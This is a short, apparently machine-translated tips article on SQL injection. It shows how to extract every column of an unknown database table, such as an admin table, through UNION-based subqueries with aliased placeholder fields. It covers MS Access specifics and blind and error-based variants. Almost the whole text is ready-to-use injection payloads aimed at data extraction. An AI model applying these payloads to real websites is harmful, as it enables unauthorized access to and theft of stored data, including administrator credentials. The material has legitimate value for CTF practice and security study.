TIPS: Ignore field names using subqueries

TIPS: Ignore field names using subqueries

Condition: The table name and field name are unknown. The database supports subqueries.

It is useful to deal with access and can also be used for laziness, such as reading data from various ctf flag tables.
Idea: Write a joint query for the target table in the subquery: The first query uses a constant as the placeholder for each field and specifies an alias; all fields (*) In the target table are queried in the joint query followed by the query. The result set of this subquery is also queried in the joint query or blind injection.
For example, there are injection points:

select title,time,author,content from article where id={inject here}

Field 4. The table name admin is known, and the admin field is unknown.
First, let's guess the total number of fields in the admin table and add order by to the subquery. 999999999 is a nonexistent id:

select title,time,author,content from article where id=999999999 union select 1,2,3,4 from(select * from admin order by 1)

Assume that the total number of fields obtained is five. Create a joint query statement for the subquery and specify the alias:

select 1 as field_1,2 as field_2,3 as field_3,4 as field_4,5 as field_5 from admin where 1=2 union select * from admin

Finally, you can query the subquery result set:

select title,time,author,content from article where id=999999999 union select 1,2,3,field_1&'|'&field_2&'|'&field_3&'|'&field_4&'|'&field_5 from(select 1 as field_1,2 as field_2,3 as field_3,4 as field_4,5 as field_5 from admin where 1=2 union select * from admin)

When the database is access, you can not specify an alias. If access is an unnamed expression, an alias is automatically added. The first one is Expr1000 and the second one is Expr1001. The preceding statement can be changed:

select title,time,author,content from article where id=999999999 union select 1 as x,2 as xx,3 as xxx,Expr1000&'|'&Expr1001&'|'&Expr1002&'|'&Expr1003&'|'&Expr1004 as xxxx from(select 1,2,3,4,5 from admin where 1=2 union select * from admin)

NOTE: If an expression exists in the original statement, the query method may be incorrect.

When conditions need to be added, set another layer of subquery:

select title,time,author,content from article where id=999999999 union select 1,2,3,field_1&'|'&field_2&'|'&field_3&'|'&field_4&'|'&field_5 from(select * from (select 1 as field_1,2 as field_2,3 as field_3,4 as field_4,5 as field_5 from admin where 1=2 union select * from admin) where field_1 not in (1))

This can be used for blind injection (when the ECHO is not the same ):

select title,time,author,content from article where id=999999999 or (select top 1 len(field_1) from(select 1 as field_1,2,3,4,5 from admin where 1=2 union select * from admin))>0

This can also be used (when an error is reported or 500/200 is different for multiple substitution attempts ):

select title,time,author,content from article where id=999999999 or iif((select top 1 len(field_1) from(select 1 as field_1,2,3,4,5 from admin where 1=2 union select * from admin))>0,1,(select 2 from multi_rows_table))=1

The number of records in multi_rows_table must be greater than 1.
Finally, some databases need to specify the alias for the subquery (access is not required so it is not written ).

"Mom no longer worries about my access injection !"